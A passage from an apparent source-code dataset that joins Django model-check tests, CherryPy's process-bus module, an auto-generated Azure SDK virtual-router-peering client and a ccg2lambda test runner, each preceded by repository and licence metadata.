through_fields=('invalid_field_1', 'invalid_field_2'),
)
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
errors = field.check(from_model=Event)
expected = [
Error(
"The intermediary model 'invalid_models_tests.Invitation' has no field 'invalid_field_1'.",
hint="Did you mean one of the following foreign keys to 'Event': event?",
obj=field,
id='fields.E338',
),
Error(
"The intermediary model 'invalid_models_tests.Invitation' has no field 'invalid_field_2'.",
hint="Did you mean one of the following foreign keys to 'Fan': invitee, inviter?",
obj=field,
id='fields.E338',
),
]
self.assertEqual(expected, errors)
def test_explicit_field_names(self):
"""
If ``through_fields`` kwarg is given, it must specify both
link fields of the intermediary table.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(Fan, through='Invitation', through_fields=(None, 'invitee'))
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
errors = field.check(from_model=Event)
expected = [
Error(
"Field specifies 'through_fields' but does not provide the names "
"of the two link fields that should be used for the relation "
"through model 'invalid_models_tests.Invitation'.",
hint="Make sure you specify 'through_fields' as through_fields=('field1', 'field2')",
obj=field,
id='fields.E337')]
self.assertEqual(expected, errors)
def test_superset_foreign_object(self):
class Parent(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
c = models.PositiveIntegerField()
class Meta:
unique_together = (('a', 'b', 'c'),)
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
value = models.CharField(max_length=255)
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
related_name='children',
)
field = Child._meta.get_field('parent')
errors = field.check(from_model=Child)
expected = [
Error(
"No subset of the fields 'a', 'b' on model 'Parent' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
),
]
self.assertEqual(expected, errors)
def test_intersection_foreign_object(self):
class Parent(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
c = models.PositiveIntegerField()
d = models.PositiveIntegerField()
class Meta:
unique_together = (('a', 'b', 'c'),)
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
d = models.PositiveIntegerField()
value = models.CharField(max_length=255)
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b', 'd'),
to_fields=('a', 'b', 'd'),
related_name='children',
)
field = Child._meta.get_field('parent')
errors = field.check(from_model=Child)
expected = [
Error(
"No subset of the fields 'a', 'b', 'd' on model 'Parent' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
),
]
self.assertEqual(expected, errors)
| bsd-3-clause |
Arakmar/Sick-Beard | cherrypy/process/wspbus.py | 45 | 14462 | """An implementation of the Web Site Process Bus.
This module is completely standalone, depending only on the stdlib.
Web Site Process Bus
--------------------
A Bus object is used to contain and manage site-wide behavior:
daemonization, HTTP server start/stop, process reload, signal handling,
drop privileges, PID file management, logging for all of these,
and many more.
In addition, a Bus object provides a place for each web framework
to register code that runs in response to site-wide events (like
process start and stop), or which controls or otherwise interacts with
the site-wide components mentioned above. For example, a framework which
uses file-based templates would add known template filenames to an
autoreload component.
Ideally, a Bus object will be flexible enough to be useful in a variety
of invocation scenarios:
1. The deployer starts a site from the command line via a framework-
neutral deployment script; applications from multiple frameworks
are mixed in a single site. Command-line arguments and configuration
files are used to define site-wide components such as the HTTP server,
WSGI component graph, autoreload behavior, signal handling, etc.
2. The deployer starts a site via some other process, such as Apache;
applications from multiple frameworks are mixed in a single site.
Autoreload and signal handling (from Python at least) are disabled.
3. The deployer starts a site via a framework-specific mechanism;
for example, when running tests, exploring tutorials, or deploying
single applications from a single framework. The framework controls
which site-wide components are enabled as it sees fit.
The Bus object in this package uses topic-based publish-subscribe
messaging to accomplish all this. A few topic channels are built in
('start', 'stop', 'exit', 'graceful', 'log', and 'main'). Frameworks and
site containers are free to define their own. If a message is sent to a
channel that has not been defined or has no listeners, there is no effect.
In general, there should only ever be a single Bus object per process.
Frameworks and site containers share a single Bus object by publishing
messages and subscribing listeners.
The Bus object works as a finite state machine which models the current
state of the process. Bus methods move it from one state to another;
those methods then publish to subscribed listeners on the channel for
the new state.
O
|
V
STOPPING --> STOPPED --> EXITING -> X
A A |
| \___ |
| \ |
| V V
STARTED <-- STARTING
"""
import atexit
import os
try:
set
except NameError:
from sets import Set as set
import sys
import threading
import time
import traceback as _traceback
import warnings
# Here I save the value of os.getcwd(), which, if I am imported early enough,
# will be the directory from which the startup script was run. This is needed
# by _do_execv(), to change back to the original directory before execv()ing a
# new process. This is a defense against the application having changed the
# current working directory (which could make sys.executable "not found" if
# sys.executable is a relative-path, and/or cause other problems).
_startup_cwd = os.getcwd()
class ChannelFailures(Exception):
delimiter = '\n'
def __init__(self, *args, **kwargs):
# Don't use 'super' here; Exceptions are old-style in Py2.4
# See http://www.cherrypy.org/ticket/959
Exception.__init__(self, *args, **kwargs)
self._exceptions = list()
def handle_exception(self):
self._exceptions.append(sys.exc_info())
def get_instances(self):
return [instance for cls, instance, traceback in self._exceptions]
def __str__(self):
exception_strings = map(repr, self.get_instances())
return self.delimiter.join(exception_strings)
def __nonzero__(self):
return bool(self._exceptions)
# Use a flag to indicate the state of the bus.
class _StateEnum(object):
class State(object):
name = None
def __repr__(self):
return "states.%s" % self.name
def __setattr__(self, key, value):
if isinstance(value, self.State):
value.name = key
object.__setattr__(self, key, value)
states = _StateEnum()
states.STOPPED = states.State()
states.STARTING = states.State()
states.STARTED = states.State()
states.STOPPING = states.State()
states.EXITING = states.State()
class Bus(object):
"""Process state-machine and messenger for HTTP site deployment.
All listeners for a given channel are guaranteed to be called even
if others at the same channel fail. Each failure is logged, but
execution proceeds on to the next listener. The only way to stop all
processing from inside a listener is to raise SystemExit and stop the
whole server.
"""
states = states
state = states.STOPPED
execv = False
def __init__(self):
self.execv = False
self.state = states.STOPPED
self.listeners = dict(
[(channel, set()) for channel
in ('start', 'stop', 'exit', 'graceful', 'log', 'main')])
self._priorities = {}
def subscribe(self, channel, callback, priority=None):
"""Add the given callback at the given channel (if not present)."""
if channel not in self.listeners:
self.listeners[channel] = set()
self.listeners[channel].add(callback)
if priority is None:
priority = getattr(callback, 'priority', 50)
self._priorities[(channel, callback)] = priority
def unsubscribe(self, channel, callback):
"""Discard the given callback (if present)."""
listeners = self.listeners.get(channel)
if listeners and callback in listeners:
listeners.discard(callback)
del self._priorities[(channel, callback)]
def publish(self, channel, *args, **kwargs):
"""Return output of all subscribers for the given channel."""
if channel not in self.listeners:
return []
exc = ChannelFailures()
output = []
items = [(self._priorities[(channel, listener)], listener)
for listener in self.listeners[channel]]
items.sort()
for priority, listener in items:
try:
output.append(listener(*args, **kwargs))
except KeyboardInterrupt:
raise
except SystemExit, e:
# If we have previous errors ensure the exit code is non-zero
if exc and e.code == 0:
e.code = 1
raise
except:
exc.handle_exception()
if channel == 'log':
# Assume any further messages to 'log' will fail.
pass
else:
self.log("Error in %r listener %r" % (channel, listener),
level=40, traceback=True)
if exc:
raise exc
return output
def _clean_exit(self):
"""An atexit handler which asserts the Bus is not running."""
if self.state != states.EXITING:
warnings.warn(
"The main thread is exiting, but the Bus is in the %r state; "
"shutting it down automatically now. You must either call "
"bus.block() after start(), or call bus.exit() before the "
"main thread exits." % self.state, RuntimeWarning)
self.exit()
def start(self):
"""Start all services."""
atexit.register(self._clean_exit)
self.state = states.STARTING
self.log('Bus STARTING')
try:
self.publish('start')
self.state = states.STARTED
self.log('Bus STARTED')
except (KeyboardInterrupt, SystemExit):
raise
except:
self.log("Shutting down due to error in start listener:",
level=40, traceback=True)
e_info = sys.exc_info()
try:
self.exit()
except:
# Any stop/exit errors will be logged inside publish().
pass
raise e_info[0], e_info[1], e_info[2]
def exit(self):
"""Stop all services and prepare to exit the process."""
exitstate = self.state
try:
self.stop()
self.state = states.EXITING
self.log('Bus EXITING')
self.publish('exit')
# This isn't strictly necessary, but it's better than seeing
# "Waiting for child threads to terminate..." and then nothing.
self.log('Bus EXITED')
except:
# This method is often called asynchronously (whether thread,
# signal handler, console handler, or atexit handler), so we
# can't just let exceptions propagate out unhandled.
# Assume it's been logged and just die.
os._exit(70) # EX_SOFTWARE
if exitstate == states.STARTING:
# exit() was called before start() finished, possibly due to
# Ctrl-C because a start listener got stuck. In this case,
# we could get stuck in a loop where Ctrl-C never exits the
# process, so we just call os.exit here.
os._exit(70) # EX_SOFTWARE
def restart(self):
"""Restart the process (may close connections).
This method does not restart the process from the calling thread;
instead, it stops the bus and asks the main thread to call execv.
"""
self.execv = True
self.exit()
def graceful(self):
"""Advise all services to reload."""
self.log('Bus graceful')
self.publish('graceful')
def block(self, interval=0.1):
"""Wait for the EXITING state, KeyboardInterrupt or SystemExit.
This function is intended to be called only by the main thread.
After waiting for the EXITING state, it also waits for all threads
to terminate, and then calls os.execv if self.execv is True. This
design allows another thread to call bus.restart, yet have the main
thread perform the actual execv call (required on some platforms).
"""
try:
self.wait(states.EXITING, interval=interval, channel='main')
except (KeyboardInterrupt, IOError):
# The time.sleep call might raise
# "IOError: [Errno 4] Interrupted function call" on KBInt.
self.log('Keyboard Interrupt: shutting down bus')
self.exit()
except SystemExit:
self.log('SystemExit raised: shutting down bus')
self.exit()
raise
# Waiting for ALL child threads to finish is necessary on OS X.
# See http://www.cherrypy.org/ticket/581.
# It's also good to let them all shut down before allowing
# the main thread to call atexit handlers.
# See http://www.cherrypy.org/ticket/751.
self.log("Waiting for child threads to terminate...")
for t in threading.enumerate():
if t != threading.currentThread() and t.isAlive():
# Note that any dummy (external) threads are always daemonic.
if hasattr(threading.Thread, "daemon"):
# Python 2.6+
d = t.daemon
else:
d = t.isDaemon()
if not d:
t.join()
if self.execv:
self._do_execv()
def wait(self, state, interval=0.1, channel=None):
"""Wait for the given state(s)."""
if isinstance(state, (tuple, list)):
states = state
else:
states = [state]
def _wait():
while self.state not in states:
time.sleep(interval)
self.publish(channel)
# From http://psyco.sourceforge.net/psycoguide/bugs.html:
# "The compiled machine code does not include the regular polling
# done by Python, meaning that a KeyboardInterrupt will not be
# detected before execution comes back to the regular Python
# interpreter. Your program cannot be interrupted if caught
# into an infinite Psyco-compiled loop."
try:
sys.modules['psyco'].cannotcompile(_wait)
except (KeyError, AttributeError):
pass
_wait()
def _do_execv(self):
"""Re-execute the current process.
This must be called from the main thread, because certain platforms
(OS X) don't allow execv to be called in a child thread very well.
"""
args = sys.argv[:]
self.log('Re-spawning %s' % ' '.join(args))
args.insert(0, sys.executable)
if sys.platform == 'win32':
args = ['"%s"' % arg for arg in args]
os.chdir(_startup_cwd)
os.execv(sys.executable, args)
def stop(self):
"""Stop all services."""
self.state = states.STOPPING
self.log('Bus STOPPING')
self.publish('stop')
self.state = states.STOPPED
self.log('Bus STOPPED')
def start_with_callback(self, func, args=None, kwargs=None):
"""Start 'func' in a new thread T, then start self (and return T)."""
if args is None:
args = ()
if kwargs is None:
kwargs = {}
args = (func,) + args
def _callback(func, *a, **kw):
self.wait(states.STARTED)
func(*a, **kw)
t = threading.Thread(target=_callback, args=args, kwargs=kwargs)
t.setName('Bus Callback ' + t.getName())
t.start()
self.start()
return t
def log(self, msg="", level=20, traceback=False):
"""Log the given message. Append the last traceback if requested."""
if traceback:
exc = sys.exc_info()
msg += "\n" + "".join(_traceback.format_exception(*exc))
self.publish('log', msg, level)
bus = Bus()
| gpl-3.0 |
Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_08_01/operations/_virtual_router_peerings_operations.py | 1 | 22472 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualRouterPeeringsOperations(object):
"""VirtualRouterPeeringsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified peering from a Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
peering_name=peering_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualRouterPeering"
"""Gets the specified Virtual Router Peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the Virtual Router Peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualRouterPeering, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.VirtualRouterPeering
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
parameters, # type: "_models.VirtualRouterPeering"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualRouterPeering"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualRouterPeering')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
parameters, # type: "_models.VirtualRouterPeering"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualRouterPeering"]
"""Creates or updates the specified Virtual Router Peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the Virtual Router Peering.
:type peering_name: str
:param parameters: Parameters supplied to the create or update Virtual Router Peering
operation.
:type parameters: ~azure.mgmt.network.v2020_08_01.models.VirtualRouterPeering
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualRouterPeering or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_08_01.models.VirtualRouterPeering]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
peering_name=peering_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.VirtualRouterPeeringListResult"]
"""Lists all Virtual Router Peerings in a Virtual Router resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterPeeringListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_08_01.models.VirtualRouterPeeringListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeeringListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterPeeringListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings'} # type: ignore
| mit |
mynlp/ccg2lambda | scripts/run_tests.py | 1 | 3569 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# Copyright 2015 Pascual Martinez-Gomez
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from abduction_tools_test import GetPremisesThatMatchConclusionArgsTestCase
from abduction_tools_test import GetTreePredArgsTestCase
from category_test import CategoryTestCase
from ccg2lambda_tools_test import AssignSemanticsToCCGTestCase
from ccg2lambda_tools_test import AssignSemanticsToCCGWithFeatsTestCase
from ccg2lambda_tools_test import get_attributes_from_ccg_node_recursivelyTestCase
from ccg2lambda_tools_test import TypeRaiseTestCase
from knowledge_test import LexicalRelationsTestCase
from nltk2coq_test import Nltk2coqTestCase
from semantic_index_test import GetSemanticRepresentationTestCase
from semantic_tools_test import resolve_prefix_to_infix_operationsTestCase
from semantic_types_test import ArbiAutoTypesTestCase
from semantic_types_test import build_arbitrary_dynamic_libraryTestCase
from semantic_types_test import build_dynamic_libraryTestCase
from semantic_types_test import Coq2NLTKTypesTestCase
from semantic_types_test import Coq2NLTKSignaturesTestCase
from semantic_types_test import combine_signatures_or_rename_predsTestCase
if __name__ == '__main__':
suite1 = unittest.TestLoader().loadTestsFromTestCase(AssignSemanticsToCCGTestCase)
suite2 = unittest.TestLoader().loadTestsFromTestCase(AssignSemanticsToCCGWithFeatsTestCase)
suite3 = unittest.TestLoader().loadTestsFromTestCase(TypeRaiseTestCase)
suite4 = unittest.TestLoader().loadTestsFromTestCase(build_dynamic_libraryTestCase)
suite5 = unittest.TestLoader().loadTestsFromTestCase(resolve_prefix_to_infix_operationsTestCase)
suite6 = unittest.TestLoader().loadTestsFromTestCase(Nltk2coqTestCase)
suite7 = unittest.TestLoader().loadTestsFromTestCase(build_arbitrary_dynamic_libraryTestCase)
suite8 = unittest.TestLoader().loadTestsFromTestCase(LexicalRelationsTestCase)
suite9 = unittest.TestLoader().loadTestsFromTestCase(Coq2NLTKTypesTestCase)
suite10 = unittest.TestLoader().loadTestsFromTestCase(Coq2NLTKSignaturesTestCase)
suite11 = unittest.TestLoader().loadTestsFromTestCase(ArbiAutoTypesTestCase)
suite12 = unittest.TestLoader().loadTestsFromTestCase(get_attributes_from_ccg_node_recursivelyTestCase)
suite13 = unittest.TestLoader().loadTestsFromTestCase(GetSemanticRepresentationTestCase)
suite14 = unittest.TestLoader().loadTestsFromTestCase(GetTreePredArgsTestCase)
